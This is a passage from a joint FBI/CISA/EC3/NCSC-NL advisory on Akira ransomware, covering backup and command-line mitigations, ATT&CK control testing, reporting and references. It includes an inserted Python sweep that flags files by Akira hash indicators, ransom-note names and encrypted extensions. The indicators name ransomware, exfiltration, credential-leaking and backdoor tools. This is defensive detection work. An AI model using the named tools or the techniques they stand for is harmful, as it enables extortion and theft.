  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].
  • Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure it will not be severely interrupted and/or left with irretrievable data.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
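An added example of the "identify, detect, and investigate" item above, applied to what this advisory gives a defender to look for: a file-system sweep that checks file hashes against a subset of the Table 2a/2b indicators and flags the artifacts the Encryption section attributes to the encryptors (.akira, .powerranges and akiranew extensions, fn.txt and akiranew.txt notes). This is my own Python, not code from the advisory; the hashes are copied from Table 2, and the only constructed items are the sample files used to exercise it.

```python
import hashlib
import os
from pathlib import Path

# SHA-256 indicators copied from Table 2a of this advisory (a subset, lowercased).
AKIRA_SHA256 = {
    "d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca": "w.exe (Akira ransomware)",
    "dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e": "Win.exe (Akira ransomware encryptor)",
    "aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9": "Rclone.exe (exfiltration tool)",
    "aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d": "VeeamHax.exe (credential leaking tool)",
    "8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694": "sshd.exe (OpenSSH backdoor)",
    "3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75": "Akira_v2 ransomware",
    "0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c": "Akira_v2 ransomware",
}
# MD5 indicator copied from Table 2b.
AKIRA_MD5 = {"7a647af3c112ad805296a22b2a276e7c": "winrar-x64-623.exe"}

# Artifacts the Encryption section attributes to the encryptors.
RANSOM_EXTENSIONS = {".akira", ".powerranges", ".akiranew"}
RANSOM_NOTES = {"fn.txt", "akiranew.txt"}


def file_digests(path, chunk_size=1 << 20):
    """Return (sha256, md5) hex digests of a file, read in chunks."""
    sha256 = hashlib.sha256()
    md5 = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            sha256.update(block)
            md5.update(block)
    return sha256.hexdigest(), md5.hexdigest()


def sweep(root, sha256_iocs=AKIRA_SHA256, md5_iocs=AKIRA_MD5):
    """Walk `root` and return findings as (path, kind, detail) tuples.

    kind is one of: ransom_note, encrypted_extension, sha256_ioc, md5_ioc.
    One file can yield more than one finding.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.lower() in RANSOM_NOTES:
                findings.append((str(path), "ransom_note", name))
            if path.suffix.lower() in RANSOM_EXTENSIONS:
                findings.append((str(path), "encrypted_extension", path.suffix))
            try:
                sha256, md5 = file_digests(path)
            except OSError:
                continue  # unreadable or vanished file; nothing more to check
            if sha256 in sha256_iocs:
                findings.append((str(path), "sha256_ioc", sha256_iocs[sha256]))
            if md5 in md5_iocs:
                findings.append((str(path), "md5_ioc", md5_iocs[md5]))
    return findings


if __name__ == "__main__":
    import sys
    for path, kind, detail in sweep(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{kind:20} {path}  {detail}")
```

Hash indicators are the weakest signal here (a rebuilt sample has a new hash, which is why Table 2 lists many for Megazord) and the extension and note checks only fire after encryption has started, so this sweep is for scoping an incident and confirming cleanup rather than prevention; the network and EDR monitoring the advisory recommends is what catches the earlier stages.
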
VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4 -12).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REFERENCES

  1. Fortinet: Ransomware Roundup - Akira
  2. Cisco: Akira Ransomware Targeting VPNs without MFA
  3. Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259
  4. TrendMicro: Akira Ransomware Spotlight
  5. CrowdStrike: What is a Kerberoasting Attack?
  6. Sophos: Akira, again: The ransomware that keeps on taking
  7. Sophos: Akira Ransomware is “bringin’ 1988 back”

REPORTING

Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or (888) 282-0870).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.

ACKNOWLEDGEMENTS

Cisco and Sophos contributed to this advisory.

VERSION HISTORY

April 18, 2024: Initial version.
